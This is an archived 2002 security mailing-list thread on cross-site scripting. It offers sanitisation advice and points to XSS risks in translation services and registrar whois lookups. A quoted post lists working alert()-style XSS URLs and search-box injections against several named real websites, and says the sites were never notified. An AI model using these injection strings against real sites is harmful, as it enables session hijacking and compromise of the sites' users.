Re: CSS, CSS & let me give you some more CSS

From: M. Burnett (mb@xato.net)
Date: 01/31/02 

From: "M. Burnett" <mb@xato.net>
To: <vuln-dev@securityfocus.com>
Date: Thu, 31 Jan 2002 10:06:05 -0700

In the process of translating this French tutorial into English using
babelfish.altavista.com, I noticed that it converted the encoded
characters in the document. Which brings up another potential source
of cross-site scripting attacks via translation and other online
tools. Using a variety of techniques, one could formulate a URL that
appears to be coming from altavista.com but in fact is loading a page
loaded with nefarious code from any site. Similar vulnerabilities
could potentially be found in sites such as HTML validation utilities
or broken link checkers.

I also found several domain name registrars that had whois lookups
that were vulnerable to cross-site scripting. These in particular
could be serious vulnerabilities as some of these registrars allow
login via cookies. By sending a properly crafted URL to the right
person, one could potentially hijack another's domain.

Mark Burnett
www.xato.net

On Tue, 29 Jan 2002 23:25:52 +0100, Frog Frog wrote:
>Nice... I just want to say that there is a tutoriel in french about
>cross site scripting : http://balteam.multimania.com/Tuts/css.txt .
>If you have additions or advices, please send them to me... Thx :)
>
>>From: "- phinegeek -" <phine@anonymous.to> To: vuln
>>-dev@securityfocus.com Subject: CSS, CSS & let me give you some
>>more CSS Date: Tue, 29 Jan 2002 00:31:21 -0800
>>
>>A little while back I posted some info on a CSS bug I found on
>>ebay, http://securityfocus.com/archive/82/246275.
>>Just about every site(not joking) you go to has this type of
>>vulnerability, its nothing new. Luckily, CSS vulns are very easy
>>to fix, after they are discovered.
>>However, you shouldn't have to wait until your site is prefixed
>>with "Cross Site Scripting" on a Bugtraq posting. These types of
>>errors, as well as many other similar(but less threatening) types
>>are the product of careless programming practices.
>>All you need is a method(call it SecureHTML()) that you run all
>>your input through, before it gets displayed back to the user.
>>This method would be used throughout your site in a modularized
>>fashion.
>>Isn't this how we should be doing it anyway???
>>This simple principle can also be used for input that becomes part
>>of an SQL statement(call it SecureSQL()) to guard against sql
>>injection.
>>Just modularize your code folks and make sure all your developers
>>use the methods when dealing with input.
>>Its really that simple.
>>This is also not new, I guess you could call it prevention?
>>
>>and heres some fun.. alot of Security issues =]
>>
>>Security Focus: http://securityfocus.com/ (copy and paste the text
>>below in the search box just like it is)
>>CSS OR "><SCRIPT><!-- ..tsk tsk tsk.. --></SCRIPT>"
>>
>>Digital Security:
>>http://www.eeye.com/html/forms/recommend.html?u=eeye.com/>;al
e

>>rt('Digital+Security?');</SCRIPT>
>>
>>Internet Security:
>>http://www.iss.net/search.php?pattern=>alert('Internet+Securi

>>ty?');</script>
>>
>>Linux Security: http://search.linuxsecurity.com/cgi-
>>bin/htsearch?words="><script>alert('Linux+Security?')</script>
>>
>>Macintosh Security:
>>http://www.macintoshsecurity.com/search.php?query="><SCRIPT&#62;aler
t('M

>>acintosh+Security?')</SCRIPT>
>>
>>Social Security??: http://www.ssa.gov/online/forms.html (copy and
>>paste the text below in the search box just like it is)
>>Social Security <SCRIPT>alert('Social Security?');</SCRIPT>
>>
>>
>>'phine
>>
>>p.s. none of the sites above have been notified.
>>If I were to tell them, I would feel guilty and have to tell the
>>others I know about(too many), then I would have to quit my night
>>job.
>>
>>------------------------------------------------------------
>>This email was sent through the free email service at
>>http://www.anonymous.to/ To report abuse, please visit our website
>>and click 'Contact Us.'
>
>
>
>
>_________________________________________________________________
>MSN Photos est le moyen le plus simple de partager et imprimer vos
>photos : http://photos.msn.fr/Support/WorldWide.aspx
>
>

Relevant Pages

  • [NT] HelpBox Multiple SQL Injection Vulnerabilties
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... HelpBox SQL. ... These SQL injection vulnerabilities is worsen by the fact that some ASP ...
    (Securiteam)
  • [NT] Facto System CMS Contains Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... and can use Microsoft Access or SQL Server as a database backend. ... Multiple SQL injection vulnerabilities exist in the Facto System Content ...
    (Securiteam)
  • [UNIX] SQL Poisoning Vulnerability in Mantis
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A security vulnerability in Mantis ... SQL statements allowing them to compromise the database's integrity. ... Most of these vulnerabilities are only exploitable in a limited ...
    (Securiteam)
  • [Full-disclosure] CORE-2009-0108: Multiple vulnerabilities in Sun Calendar Express Web S
    ... Multiple vulnerabilities in Sun Calendar Express Web Server ... These vulnerabilities were discovered by the SCS team from Core Security ...
    (Full-Disclosure)
  • CORE-2009-0108: Multiple vulnerabilities in Sun Calendar Express Web Server
    ... Multiple vulnerabilities in Sun Calendar Express Web Server ... These vulnerabilities were discovered by the SCS team from Core Security ...
    (Bugtraq)